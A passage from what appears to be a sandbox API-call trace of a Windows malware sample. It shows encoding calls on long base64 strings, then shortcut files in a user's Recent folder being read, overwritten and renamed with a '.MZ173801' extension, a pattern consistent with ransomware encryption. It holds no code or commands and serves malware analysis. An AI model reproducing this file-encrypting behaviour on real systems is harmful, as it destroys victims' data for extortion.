lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.106] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.106] GetCurrentThreadId () returned 0x1358 [0107.106] GetCurrentThreadId () returned 0x1358 [0107.106] GetCurrentThreadId () returned 0x1358 [0107.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.107] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.107] GetCurrentThreadId () returned 0x1358 [0107.107] GetCurrentThreadId () returned 0x1358 [0107.107] GetCurrentThreadId () returned 0x1358 [0107.107] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AGpwWiEbNPs_OK mC0E.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\agpwwiebnps_ok mc0e.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.107] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.107] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.107] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x54c [0107.107] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.107] ReadFile (in: hFile=0x3f4, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x54c, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x54c, lpOverlapped=0x0) returned 1 [0107.108] CloseHandle (hObject=0x3f4) returned 1 [0107.108] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AGpwWiEbNPs_OK mC0E.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\agpwwiebnps_ok mc0e.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.109] WriteFile (in: hFile=0x3f4, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x54c, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x54c, lpOverlapped=0x0) returned 1 [0107.110] CloseHandle (hObject=0x3f4) returned 1 [0107.111] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AGpwWiEbNPs_OK mC0E.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\agpwwiebnps_ok mc0e.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AGpwWiEbNPs_OK mC0E.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\agpwwiebnps_ok mc0e.lnk.mz173801")) returned 1 [0107.112] GetCurrentThreadId () returned 0x1358 [0107.112] GetCurrentThreadId () returned 0x1358 [0107.112] GetCurrentThreadId () returned 0x1358 [0107.112] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeacec7c2, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x75ee4ef7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75ee62aa, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x497, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="ATjrrwOvtU.lnk", cAlternateFileName="ATJRRW~1.LNK")) returned 1 [0107.112] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0107.112] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0107.112] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATjrrwOvtU.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\atjrrwovtu.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeacec7c2, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x75ee4ef7, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x75ee62aa, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x497)) returned 1 [0107.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0107.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0107.113] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0107.114] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATjrrwOvtU.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\atjrrwovtu.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.114] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0107.114] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.114] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x497 [0107.114] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0107.114] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x497, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x497, lpOverlapped=0x0) returned 1 [0107.115] CloseHandle (hObject=0x3f4) returned 1 [0107.115] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATjrrwOvtU.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\atjrrwovtu.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0107.116] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x497, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x497, lpOverlapped=0x0) returned 1 [0107.117] CloseHandle (hObject=0x3f4) returned 1 [0107.117] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ATjrrwOvtU.lnk" (normalized: 